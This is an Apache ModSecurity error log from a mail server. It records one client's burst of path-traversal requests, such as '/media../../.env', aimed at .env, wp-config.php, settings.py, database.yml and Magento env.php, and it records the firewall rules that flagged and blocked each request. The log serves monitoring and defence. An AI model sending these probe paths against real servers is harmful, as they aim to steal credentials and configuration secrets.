[Tue May 12 05:30:52.385706 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKe7Nr1yOh9TvizezigNAAAAEc"]
[Tue May 12 05:30:52.385940 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKe7Nr1yOh9TvizezigNAAAAEc"]
[Tue May 12 05:30:53.202553 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe7Nr1yOh9TvizezigNAAAAEc"]
[Tue May 12 05:30:53.243496 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKe7dr1yOh9TvizezigNwAAAEc"]
[Tue May 12 05:30:53.243693 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKe7dr1yOh9TvizezigNwAAAEc"]
[Tue May 12 05:30:54.039780 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe7dr1yOh9TvizezigNwAAAEc"]
[Tue May 12 05:30:54.080822 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKe7tr1yOh9TvizezigOgAAAEc"]
[Tue May 12 05:30:54.081055 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKe7tr1yOh9TvizezigOgAAAEc"]
[Tue May 12 05:30:54.868156 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe7tr1yOh9TvizezigOgAAAEc"]
[Tue May 12 05:30:54.909463 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe7tr1yOh9TvizezigPQAAAEc"]
[Tue May 12 05:30:54.909537 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe7tr1yOh9TvizezigPQAAAEc"]
[Tue May 12 05:30:54.909705 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe7tr1yOh9TvizezigPQAAAEc"]
[Tue May 12 05:30:55.702793 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe7tr1yOh9TvizezigPQAAAEc"]
[Tue May 12 05:30:55.743559 2026] [core:error] [pid 1825179:tid 1825205] [client 45.148.10.247:6906] AH10244: invalid URI path (/media../../../.env)
[Tue May 12 05:30:56.616228 2026] [core:error] [pid 1808852:tid 1808868] [client 45.148.10.247:51156] AH10244: invalid URI path (/media../../../../.env)
[Tue May 12 05:30:57.487800 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe8faAnTZtx1_H_wy3mgAAAUk"]
[Tue May 12 05:30:57.487883 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe8faAnTZtx1_H_wy3mgAAAUk"]
[Tue May 12 05:30:57.488103 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe8faAnTZtx1_H_wy3mgAAAUk"]
[Tue May 12 05:30:58.285233 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe8faAnTZtx1_H_wy3mgAAAUk"]
[Tue May 12 05:30:58.325947 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe8vaAnTZtx1_H_wy3mwAAAUk"]
[Tue May 12 05:30:58.326016 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe8vaAnTZtx1_H_wy3mwAAAUk"]
[Tue May 12 05:30:58.326186 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe8vaAnTZtx1_H_wy3mwAAAUk"]
[Tue May 12 05:30:59.111369 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe8vaAnTZtx1_H_wy3mwAAAUk"]
[Tue May 12 05:30:59.153566 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe8_aAnTZtx1_H_wy3nAAAAUk"]
[Tue May 12 05:30:59.153641 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe8_aAnTZtx1_H_wy3nAAAAUk"]
[Tue May 12 05:30:59.153807 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe8_aAnTZtx1_H_wy3nAAAAUk"]
[Tue May 12 05:30:59.936021 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe8_aAnTZtx1_H_wy3nAAAAUk"]
[Tue May 12 05:30:59.977356 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKe8_aAnTZtx1_H_wy3nQAAAUk"]
[Tue May 12 05:30:59.977573 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKe8_aAnTZtx1_H_wy3nQAAAUk"]
[Tue May 12 05:31:00.763017 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe8_aAnTZtx1_H_wy3nQAAAUk"]
[Tue May 12 05:31:00.804412 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKe9PaAnTZtx1_H_wy3ngAAAUk"]
[Tue May 12 05:31:00.804615 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKe9PaAnTZtx1_H_wy3ngAAAUk"]
[Tue May 12 05:31:02.364819 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe9PaAnTZtx1_H_wy3ngAAAUk"]
[Tue May 12 05:31:02.405370 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKe9vaAnTZtx1_H_wy3oAAAAUk"]
[Tue May 12 05:31:02.405581 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.247:51164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKe9vaAnTZtx1_H_wy3oAAAAUk"]
